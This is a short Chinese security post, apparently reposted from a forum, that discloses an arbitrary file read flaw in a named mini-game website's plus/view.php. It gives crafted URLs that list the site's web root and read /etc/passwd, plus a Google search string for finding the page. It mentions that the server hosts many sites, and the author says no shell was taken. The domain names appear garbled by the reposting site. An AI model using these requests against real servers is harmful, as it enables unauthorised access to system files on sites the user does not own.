漏洞 文件:http://HdhCmsTest07073测试数据/plus/view.php?aid=398928 然后可以构造:比如查看主站 http://HdhCmsTest07073测试数据/plus/view.php?currentdir=/www/wwwroot/HdhCmsTest07073测试数据&aid=398928 构造起来,至于怎么知道漏洞的,还是谷歌大大牛点, 看是如何发现漏洞的、 你懂的 site:07073测试数据 inurl:php 至于危害大不大,你看了就知道 http://HdhCmsTest07073测试数据/plus/view.php?currentdir=/etc/&filename=passwd&type=.txt&aid=398928 还有就是,这服务器是站群、、 低调求发展,不拿shell
查看更多关于07073小游戏官网任意文件读取 - 网站安全 - 自学的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13975